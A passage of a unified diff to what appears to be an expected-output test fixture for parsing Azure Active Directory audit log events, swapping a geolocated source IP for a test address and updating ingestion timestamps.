me\":\"targetSPN\",\"Value\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\"},{\"Name\":\"targetName\",\"Value\":\"siem2\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"531446ed-abd2-468f-96a8-a4dcc7b05168\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-11T16:42:45.1042022Z\"},{\"Name\":\"env_epoch\",\"Value\":\"VYXPT\"},{\"Name\":\"env_seqNum\",\"Value\":\"45826464\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##51f1503a-20a3-43cd-b898-bea330e149be_00000000-0000-0000-0000-000000000000_51f1503a-20a3-43cd-b898-bea330e149be\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR559\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"15adbe69-7974-41ec-8341-208456600ad3\",\"ModifiedProperties\":[{\"Name\":\"Included Updated Properties\",\"NewValue\":\"\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"OldValue\":\"\"}],\"ObjectId\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"Operation\":\"Update service principal.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_fb91e9f0-9485-4a68-89e9-a164d20ae855\",\"Type\":2},{\"ID\":\"fb91e9f0-9485-4a68-89e9-a164d20ae855\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"siem2\",\"Type\":1},{\"ID\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"Type\":2},{\"ID\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectory", "provider": "AzureActiveDirectory", "kind": "event", @@ -15461,25 +14129,7 @@ }, { "source": { - "geo": { - "continent_name": "Europe", - "region_iso_code": "ES-B", - "city_name": "Barcelona", - "country_iso_code": "ES", - "country_name": "Spain", - "region_name": "Barcelona", - "location": { - "lon": 2.1611, - "lat": 41.3891 - } - }, - "as": { - "number": 3352, - "organization": { - "name": "Telefonica De Espana" - } - }, - "ip": "83.57.233.151" + "ip": "67.43.156.15" }, "tags": [ "preserve_original_event" @@ -15493,7 +14143,7 @@ "ObjectId": "7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40", "ResultStatus": "Success", "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", - "ActorIpAddress": "83.57.233.151", + "ActorIpAddress": "67.43.156.15", "ExtendedProperties": { "actorObjectClass": "User", "teamName": "MSODS.", @@ -15616,7 +14266,7 @@ "asr" ], "ip": [ - "83.57.233.151" + "67.43.156.15" ] }, "organization": { @@ -15628,12 +14278,12 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "client": { - "address": "83.57.233.151", - "ip": "83.57.233.151" + "address": "67.43.156.15", + "ip": "67.43.156.15" }, "event": { - "ingested": "2021-06-17T07:32:38.036498500Z", - "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"83.57.233.151\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"83.57.233.151\",\"CreationTime\":\"2020-02-11T16:42:45\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"fb91e9f0-9485-4a68-89e9-a164d20ae855\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\"},{\"Name\":\"targetName\",\"Value\":\"siem2\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"531446ed-abd2-468f-96a8-a4dcc7b05168\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-11T16:42:45.1042022Z\"},{\"Name\":\"env_epoch\",\"Value\":\"VYXPT\"},{\"Name\":\"env_seqNum\",\"Value\":\"45826464\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##51f1503a-20a3-43cd-b898-bea330e149be_00000000-0000-0000-0000-000000000000_51f1503a-20a3-43cd-b898-bea330e149be\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR559\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"15adbe69-7974-41ec-8341-208456600ad3\",\"ModifiedProperties\":[{\"Name\":\"Included Updated Properties\",\"NewValue\":\"\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"OldValue\":\"\"}],\"ObjectId\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"Operation\":\"Update service principal.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_fb91e9f0-9485-4a68-89e9-a164d20ae855\",\"Type\":2},{\"ID\":\"fb91e9f0-9485-4a68-89e9-a164d20ae855\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"siem2\",\"Type\":1},{\"ID\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"Type\":2},{\"ID\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", + "ingested": "2021-12-09T13:41:51.125272Z", + "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-11T16:42:45\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"fb91e9f0-9485-4a68-89e9-a164d20ae855\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\"},{\"Name\":\"targetName\",\"Value\":\"siem2\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"531446ed-abd2-468f-96a8-a4dcc7b05168\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-11T16:42:45.1042022Z\"},{\"Name\":\"env_epoch\",\"Value\":\"VYXPT\"},{\"Name\":\"env_seqNum\",\"Value\":\"45826464\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##51f1503a-20a3-43cd-b898-bea330e149be_00000000-0000-0000-0000-000000000000_51f1503a-20a3-43cd-b898-bea330e149be\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR559\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"15adbe69-7974-41ec-8341-208456600ad3\",\"ModifiedProperties\":[{\"Name\":\"Included Updated Properties\",\"NewValue\":\"\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"OldValue\":\"\"}],\"ObjectId\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"Operation\":\"Update service principal.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_fb91e9f0-9485-4a68-89e9-a164d20ae855\",\"Type\":2},{\"ID\":\"fb91e9f0-9485-4a68-89e9-a164d20ae855\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"siem2\",\"Type\":1},{\"ID\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"Type\":2},{\"ID\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectory", "provider": "AzureActiveDirectory", "kind": "event", @@ -15659,25 +14309,7 @@ }, { "source": { - "geo": { - "continent_name": "Europe", - "region_iso_code": "ES-B", - "city_name": "Barcelona", - "country_iso_code": "ES", - "country_name": "Spain", - "region_name": "Barcelona", - "location": { - "lon": 2.1611, - "lat": 41.3891 - } - }, - "as": { - "number": 3352, - "organization": { - "name": "Telefonica De Espana" - } - }, - "ip": "83.57.233.151" + "ip": "67.43.156.15" }, "tags": [ "preserve_original_event" @@ -15691,7 +14323,7 @@ "ObjectId": "7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40", "ResultStatus": "Success", "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", - "ActorIpAddress": "83.57.233.151", + "ActorIpAddress": "67.43.156.15", "ExtendedProperties": { "actorObjectClass": "User", "teamName": "MSODS.", @@ -15814,7 +14446,7 @@ "asr" ], "ip": [ - "83.57.233.151" + "67.43.156.15" ] }, "organization": { @@ -15826,12 +14458,12 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "client": { - "address": "83.57.233.151", - "ip": "83.57.233.151" + "address": "67.43.156.15", + "ip": "67.43.156.15" }, "event": { - "ingested": "2021-06-17T07:32:38.036502800Z", - "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"83.57.233.151\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"83.57.233.151\",\"CreationTime\":\"2020-02-11T16:42:45\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"fb91e9f0-9485-4a68-89e9-a164d20ae855\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\"},{\"Name\":\"targetName\",\"Value\":\"siem2\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"531446ed-abd2-468f-96a8-a4dcc7b05168\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-11T16:42:45.1042022Z\"},{\"Name\":\"env_epoch\",\"Value\":\"VYXPT\"},{\"Name\":\"env_seqNum\",\"Value\":\"45826464\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##51f1503a-20a3-43cd-b898-bea330e149be_00000000-0000-0000-0000-000000000000_51f1503a-20a3-43cd-b898-bea330e149be\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR559\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"15adbe69-7974-41ec-8341-208456600ad3\",\"ModifiedProperties\":[{\"Name\":\"Included Updated Properties\",\"NewValue\":\"\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"OldValue\":\"\"}],\"ObjectId\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"Operation\":\"Update service principal.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_fb91e9f0-9485-4a68-89e9-a164d20ae855\",\"Type\":2},{\"ID\":\"fb91e9f0-9485-4a68-89e9-a164d20ae855\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"siem2\",\"Type\":1},{\"ID\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"Type\":2},{\"ID\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", + "ingested": "2021-12-09T13:41:51.125277700Z", + "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-11T16:42:45\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"fb91e9f0-9485-4a68-89e9-a164d20ae855\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\"},{\"Name\":\"targetName\",\"Value\":\"siem2\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"531446ed-abd2-468f-96a8-a4dcc7b05168\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-11T16:42:45.1042022Z\"},{\"Name\":\"env_epoch\",\"Value\":\"VYXPT\"},{\"Name\":\"env_seqNum\",\"Value\":\"45826464\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##51f1503a-20a3-43cd-b898-bea330e149be_00000000-0000-0000-0000-000000000000_51f1503a-20a3-43cd-b898-bea330e149be\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR559\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"15adbe69-7974-41ec-8341-208456600ad3\",\"ModifiedProperties\":[{\"Name\":\"Included Updated Properties\",\"NewValue\":\"\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"OldValue\":\"\"}],\"ObjectId\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"Operation\":\"Update service principal.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_fb91e9f0-9485-4a68-89e9-a164d20ae855\",\"Type\":2},{\"ID\":\"fb91e9f0-9485-4a68-89e9-a164d20ae855\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"siem2\",\"Type\":1},{\"ID\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"Type\":2},{\"ID\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectory", "provider": "AzureActiveDirectory", "kind": "event", @@ -15857,25 +14489,7 @@ }, { "source": { - "geo": { - "continent_name": "Europe", - "region_iso_code": "ES-B", - "city_name": "Barcelona", - "country_iso_code": "ES", - "country_name": "Spain", - "region_name": "Barcelona", - "location": { - "lon": 2.1611, - "lat": 41.3891 - } - }, - "as": { - "number": 3352, - "organization": { - "name": "Telefonica De Espana" - } - }, - "ip": "83.57.233.151" + "ip": "67.43.156.15" }, "tags": [ "preserve_original_event" @@ -15889,7 +14503,7 @@ "ObjectId": "Not Available", "ResultStatus": "Success", "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", - "ActorIpAddress": "83.57.233.151", + "ActorIpAddress": "67.43.156.15", "ExtendedProperties": { "actorObjectClass": "User", "teamName": "MSODS.", @@ -16003,7 +14617,7 @@ "asr" ], "ip": [ - "83.57.233.151" + "67.43.156.15" ] }, "organization": { @@ -16015,12 +14629,12 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "client": { - "address": "83.57.233.151", - "ip": "83.57.233.151" + "address": "67.43.156.15", + "ip": "67.43.156.15" }, "event": { - "ingested": "2021-06-17T07:32:38.036506900Z", - "original": 